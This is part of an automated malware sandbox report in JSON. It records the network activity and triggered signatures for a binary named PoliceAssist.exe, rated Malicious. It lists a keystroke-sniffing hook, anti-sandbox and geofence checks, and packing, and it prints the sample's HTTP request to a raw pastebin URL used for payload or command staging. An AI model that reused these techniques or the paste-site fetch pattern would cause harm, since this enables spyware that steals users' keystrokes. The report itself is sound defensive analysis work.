14:01:51,051 [lib.api.process] INFO: Termination confirmed for <Process 3212 svchost.exe>\n2025-11-20 14:01:51,051 [root] DEBUG: 3212: Terminate Event: monitor shutdown complete for process 
3212\n2025-11-20 14:01:51,052 [root] INFO: Terminate event set for process 3212\n2025-11-20 14:01:51,052 [root] INFO: Created shutdown mutex\n2025-11-20 14:01:52,056 [root] INFO: Shutting down package\n2025-11-20 14:01:52,057 [root] INFO: Stopping auxiliary modules\n2025-11-20 14:01:52,057 [root] INFO: Stopping auxiliary module: Browser\n2025-11-20 14:01:52,057 [root] INFO: Stopping auxiliary module: Human\n2025-11-20 14:01:52,058 [root] INFO: Stopping auxiliary module: Screenshots\n2025-11-20 14:01:52,763 [root] INFO: Finishing auxiliary modules\n2025-11-20 14:01:52,763 [root] INFO: Shutting down pipe server and dumping dropped files\n2025-11-20 14:01:52,764 [root] WARNING: Folder at path \"C:\\PJdnys\\debugger\" does not exist, skipping\n2025-11-20 14:01:52,764 [root] INFO: Uploading files at path \"C:\\PJdnys\\tlsdump\"\n2025-11-20 14:01:52,765 [lib.common.results] INFO: Uploading file C:\\PJdnys\\tlsdump\\tlsdump.log to tlsdump\\tlsdump.log; Size is 1096; Max size: 100000000\n2025-11-20 14:01:52,770 [root] INFO: Analysis completed\n",
    "errors": []
  },
  "network": {
    "pcap_sha256": "a064cf3df5eb9288a42993e67ec6162b743eeb05086e7d25664e60a67cd0fb50",
    "hosts": [
      {
        "ip": "172.66.171.73",
        "country_name": "unknown",
        "asn": "",
        "asn_name": "",
        "hostname": "pastebin.com",
        "inaddrarpa": "",
        "ports": []
      },
      {
        "ip": "98.66.133.184",
        "country_name": "unknown",
        "asn": "",
        "asn_name": "",
        "hostname": "",
        "inaddrarpa": "",
        "ports": []
      }
    ],
    "domains": [
      {
        "domain": "mozilla.map.fastly.net",
        "ip": "151.101.129.91"
      },
      {
        "domain": "pastebin.com",
        "ip": "104.20.29.150"
      }
    ],
    "tcp": [
      {
        "src": "192.168.1.2",
        "sport": 49673,
        "dst": "98.66.133.184",
        "dport": 443,
        "offset": 24,
        "time": 0.0
      },
      {
        "src": "192.168.1.2",
        "sport": 49681,
        "dst": "40.126.53.8",
        "dport": 443,
        "offset": 8142,
        "time": 1.5392429828643799
      },
      {
        "src": "192.168.1.2",
        "sport": 49686,
        "dst": "40.127.240.158",
        "dport": 443,
        "offset": 49607,
        "time": 2.2467708587646484
      },
      {
        "src": "192.168.1.2",
        "sport": 49688,
        "dst": "35.190.72.216",
        "dport": 443,
        "offset": 63094,
        "time": 2.427560806274414
      },
      {
        "src": "192.168.1.2",
        "sport": 49690,
        "dst": "34.160.144.191",
        "dport": 443,
        "offset": 145420,
        "time": 2.7671308517456055
      },
      {
        "src": "192.168.1.2",
        "sport": 49692,
        "dst": "34.120.208.123",
        "dport": 443,
        "offset": 511282,
        "time": 6.634318828582764
      },
      {
        "src": "192.168.1.2",
        "sport": 49697,
        "dst": "172.66.171.73",
        "dport": 443,
        "offset": 526730,
        "time": 20.2219660282135
      },
      {
        "src": "192.168.1.2",
        "sport": 49672,
        "dst": "98.66.133.184",
        "dport": 443,
        "offset": 532016,
        "time": 61.00461483001709
      }
    ],
    "udp": [
      {
        "src": "192.168.1.2",
        "sport": 56138,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 7443,
        "time": 1.4447698593139648
      },
      {
        "src": "192.168.1.2",
        "sport": 58070,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 8777,
        "time": 1.5773959159851074
      },
      {
        "src": "192.168.1.2",
        "sport": 56079,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 49342,
        "time": 2.2349398136138916
      },
      {
        "src": "192.168.1.2",
        "sport": 55833,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 61716,
        "time": 2.4174909591674805
      },
      {
        "src": "192.168.1.2",
        "sport": 63927,
        "dst": "35.190.72.216",
        "dport": 443,
        "offset": 131676,
        "time": 2.659811019897461
      },
      {
        "src": "192.168.1.2",
        "sport": 60137,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 144919,
        "time": 2.759732961654663
      },
      {
        "src": "192.168.1.2",
        "sport": 64061,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 162481,
        "time": 3.2898948192596436
      },
      {
        "src": "192.168.1.2",
        "sport": 64456,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 510382,
        "time": 6.600811958312988
      },
      {
        "src": "192.168.1.2",
        "sport": 50578,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 511009,
        "time": 6.627208948135376
      },
      {
        "src": "192.168.1.2",
        "sport": 63841,
        "dst": "1.1.1.1",
        "dport": 53,
        "offset": 532494,
        "time": 61.11581087112427
      },
      {
        "src": "192.168.1.2",
        "sport": 138,
        "dst": "192.168.1.255",
        "dport": 138,
        "offset": 540540,
        "time": 137.57032680511475
      }
    ],
    "icmp": [],
    "http": [],
    "dns": [
      {
        "request": "mozilla.map.fastly.net",
        "type": "A",
        "answers": [
          {
            "type": "A",
            "data": "151.101.1.91"
          },
          {
            "type": "A",
            "data": "151.101.129.91"
          },
          {
            "type": "A",
            "data": "151.101.193.91"
          },
          {
            "type": "A",
            "data": "151.101.65.91"
          }
        ],
        "first_seen": 1763647104.742455
      },
      {
        "request": "mozilla.map.fastly.net",
        "type": "AAAA",
        "answers": [
          {
            "type": "AAAA",
            "data": "2a04:4e42:200::347"
          },
          {
            "type": "AAAA",
            "data": "2a04:4e42:600::347"
          },
          {
            "type": "AAAA",
            "data": "2a04:4e42:400::347"
          },
          {
            "type": "AAAA",
            "data": "2a04:4e42::347"
          }
        ],
        "first_seen": 1763647104.744175
      },
      {
        "request": "pastebin.com",
        "type": "A",
        "answers": [
          {
            "type": "A",
            "data": "172.66.171.73"
          },
          {
            "type": "A",
            "data": "104.20.29.150"
          }
        ],
        "first_seen": 1763647122.209603
      }
    ],
    "smtp": [],
    "irc": [],
    "dead_hosts": []
  },
  "url_analysis": {},
  "procmemory": [],
  "signatures": [
    {
      "name": "dead_connect",
      "description": "Attempts to connect to a dead IP:Port (1 unique time)",
      "categories": [
        "network"
      ],
      "severity": 1,
      "weight": 0,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "type": "call",
          "pid": 3308,
          "cid": 1424
        },
        {
          "IP": "172.66.171.73:443 (unknown)"
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "queries_keyboard_layout",
      "description": "Queries the keyboard layout",
      "categories": [
        "location_discovery"
      ],
      "severity": 1,
      "weight": 1,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "type": "call",
          "pid": 3308,
          "cid": 110
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 382
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 385
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "queries_locale_api",
      "description": "Queries the computer locale (possible geofencing)",
      "categories": [
        "location_discovery",
        "geofence"
      ],
      "severity": 1,
      "weight": 1,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "type": "call",
          "pid": 3308,
          "cid": 217
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 293
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 708
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 920
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 980
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 1129
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "antidebug_setunhandledexceptionfilter",
      "description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
      "categories": [
        "anti-debug"
      ],
      "severity": 1,
      "weight": 1,
      "confidence": 40,
      "references": [],
      "data": [
        {
          "type": "call",
          "pid": 3308,
          "cid": 31
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "language_check_registry",
      "description": "Checks system language via registry key (possible geofencing)",
      "categories": [
        "location_discovery",
        "geofence"
      ],
      "severity": 1,
      "weight": 1,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\ru-RU"
        },
        {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\ru-RU"
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "network_cnc_https_generic",
      "description": "Establishes an encrypted HTTPS connection",
      "categories": [
        "network",
        "encryption"
      ],
      "severity": 2,
      "weight": 1,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "http_request": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com\r\n\r\n"
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 1956
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "legitimate_domain_abuse",
      "description": "Connection to a legitimate domain from an unexpected process",
      "categories": [
        "network",
        "living-off-trusted-sites"
      ],
      "severity": 2,
      "weight": 1,
      "confidence": 100,
      "references": [
        "https://go.recordedfuture.com/hubfs/reports/cta-2023-0816.pdf",
        "https://lots-project.com/"
      ],
      "data": [
        {
          "type": "call",
          "pid": 3308,
          "cid": 1160
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 1204
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "suspicious_communication_trusted_site",
      "description": "Suspicious communication with abused trusted site",
      "categories": [
        "living-off-trusted-sites",
        "C&C",
        "network"
      ],
      "severity": 2,
      "weight": 1,
      "confidence": 50,
      "references": [
        "https://go.recordedfuture.com/hubfs/reports/cta-2023-0816.pdf",
        "https://lots-project.com/"
      ],
      "data": [
        {
          "type": "call",
          "pid": 3308,
          "cid": 1160
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 1161
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 1204
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 1962
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "packer_unknown_pe_section_name",
      "description": "The binary contains an unknown PE section name indicative of packing",
      "categories": [
        "packer"
      ],
      "severity": 2,
      "weight": 1,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "unknown section": {
            "name": "text",
            "raw_address": "0x0011c800",
            "virtual_address": "0x00127000",
            "virtual_size": "0x0000258d",
            "size_of_data": "0x00002600",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE",
            "characteristics_raw": "0x20000040",
            "entropy": "5.77"
          }
        },
        {
          "unknown section": {
            "name": "data",
            "raw_address": "0x0011ee00",
            "virtual_address": "0x0012a000",
            "virtual_size": "0x00006ec0",
            "size_of_data": "0x00007000",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
            "characteristics_raw": "0x40000040",
            "entropy": "6.46"
          }
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "network_dns_paste_site",
      "description": "DNS query to a paste site or service detected",
      "categories": [
        "network"
      ],
      "severity": 2,
      "weight": 1,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "domain": "pastebin.com"
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "network_cnc_https_pastesite",
      "description": "Establishes an encrypted HTTPS connection to a paste site",
      "categories": [
        "network",
        "encryption"
      ],
      "severity": 3,
      "weight": 1,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "http_request": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com\r\n\r\n"
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 1956
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "binary_yara",
      "description": "Binary file triggered YARA rule",
      "categories": [
        "static"
      ],
      "severity": 3,
      "weight": 1,
      "confidence": 80,
      "references": [],
      "data": [
        {
          "Binary triggered YARA rule": "INDICATOR_SUSPICIOUS_AHK_Downloader"
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "antisandbox_mouse_hook",
      "description": "Installs a hook procedure to monitor for mouse events",
      "categories": [
        "anti-sandbox",
        "generic"
      ],
      "severity": 3,
      "weight": 4,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "type": "call",
          "pid": 3308,
          "cid": 657
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    },
    {
      "name": "infostealer_keylog",
      "description": "Sniffs keystrokes",
      "categories": [
        "infostealer"
      ],
      "severity": 3,
      "weight": 4,
      "confidence": 100,
      "references": [],
      "data": [
        {
          "SetWindowsHookExW": "Process: PoliceAssist.exe(3308)"
        },
        {
          "type": "call",
          "pid": 3308,
          "cid": 655
        }
      ],
      "new_data": [],
      "alert": false,
      "families": []
    }
  ],
  "malscore": 9.0,
  "ttps": [
    {
      "signature": "network_cnc_https_generic",
      "ttps": [
        "T1573"
      ],
      "mbcs": [
        "OC0006",
        "C0002"
      ]
    },
    {
      "signature": "network_cnc_https_pastesite",
      "ttps": [
        "T1573"
      ],
      "mbcs": [
        "OC0006",
        "C0002"
      ]
    },
    {
      "signature": "suspicious_communication_trusted_site",
      "ttps": [
        "T1071"
      ],
      "mbcs": [
        "OC0006",
        "C0002"
      ]
    },
    {
      "signature": "packer_unknown_pe_section_name",
      "ttps": [
        "T1027.002",
        "T1027"
      ],
      "mbcs": [
        "OB0001",
        "OB0002",
        "OB0006",
        "F0001"
      ]
    },
    {
      "signature": "network_dns_paste_site",
      "ttps": [
        "T1071"
      ],
      "mbcs": [
        "OC0006",
        "C0002"
      ]
    }
  ],
  "malstatus": "Malicious"
}